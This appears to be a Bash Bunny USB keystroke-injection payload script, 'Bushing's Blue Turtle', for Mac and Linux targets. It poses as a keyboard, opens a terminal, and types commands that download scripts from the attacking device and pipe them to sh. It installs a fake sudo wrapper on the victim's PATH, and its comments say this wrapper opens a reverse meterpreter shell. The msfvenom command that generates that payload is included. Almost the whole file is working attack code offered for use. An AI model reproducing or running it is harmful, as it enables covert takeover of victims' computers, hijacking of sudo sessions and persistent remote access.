116 lines
3.0 KiB
Plaintext
116 lines
3.0 KiB
Plaintext
|
#!/bin/bash
|
||
|
|
|
||
|
|
# Title: Bushing's Blue Turtle
|
||
|
|
# Author: Michael Weinstein
|
||
|
|
# Target: Mac/Linux
|
||
|
|
# Version: 0.1
|
||
|
|
#
|
||
|
|
# Create a wrapper for sudo sessions that
|
||
|
|
# will live inside ~/.config/sudo and be added
|
||
|
|
# to the $PATH. After completing the sudo task
|
||
|
|
# for the user, it will attempt an encrypted reverse
|
||
|
|
# meterpreter session. The msfvenom payload
|
||
|
|
# should be in this same directory as shell.py
|
||
|
|
# Run the following command to generate a payload,
|
||
|
|
# remember to input the appropriate IP and port
|
||
|
|
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
|
||
|
|
#
|
||
|
|
# This payload was inspired greatly by SudoBackdoor
|
||
|
|
# and much of the code here was derived (or copied
|
||
|
|
# wholesale) from that with great thanks to oXis.
|
||
|
|
#
|
||
|
|
# This one's for Bushing. Probably should have written it in Perl.
|
||
|
|
#
|
||
|
|
# White | Ready
|
||
|
|
# Amber blinking | Waiting for server
|
||
|
|
# Blue blinking | Attacking
|
||
|
|
# Green | Finished
|
||
|
|
|
||
|
|
LED SETUP
|
||
|
|
|
||
|
|
#setup the attack on macos (if false, attack is for Linux)
|
||
|
|
mac=false
|
||
|
|
|
||
|
|
if [ "$mac" = true ]
|
||
|
|
then
|
||
|
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||
|
|
else
|
||
|
|
ATTACKMODE ECM_ETHERNET HID
|
||
|
|
fi
|
||
|
|
|
||
|
|
DUCKY_LANG us
|
||
|
|
|
||
|
|
GET SWITCH_POSITION
|
||
|
|
GET HOST_IP
|
||
|
|
|
||
|
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||
|
|
|
||
|
|
# starting server
|
||
|
|
LED SPECIAL
|
||
|
|
|
||
|
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||
|
|
python -m SimpleHTTPServer 80 &
|
||
|
|
|
||
|
|
# wait until port is listening (credit audibleblink)
|
||
|
|
while ! nc -z localhost 80; do sleep 0.2; done
|
||
|
|
# that was brilliant!
|
||
|
|
|
||
|
|
LED ATTACK
|
||
|
|
|
||
|
|
if [ "$mac" = true ]
|
||
|
|
then
|
||
|
|
RUN OSX terminal
|
||
|
|
else
|
||
|
|
RUN UNITY xterm
|
||
|
|
fi
|
||
|
|
QUACK DELAY 2000
|
||
|
|
|
||
|
|
if [ "$mac" = true ]
|
||
|
|
then
|
||
|
|
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK STRING curl "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo"
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK STRING curl "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo"
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
else
|
||
|
|
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK STRING wget -O - "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo" #Will test this on a mac when I finish up
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK STRING wget -O - "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo" #Will test this on a mac when I finish up
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
fi
|
||
|
|
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
QUACK DELAY 200
|
||
|
|
if [ "$mac" = true ]
|
||
|
|
then
|
||
|
|
QUACK DELAY 5000 #seems like macs need some extra time on this
|
||
|
|
QUACK GUI w
|
||
|
|
else
|
||
|
|
QUACK STRING exit
|
||
|
|
QUACK DELAY 200
|
||
|
|
QUACK ENTER
|
||
|
|
fi
|
||
|
|
LED SUCCESS
|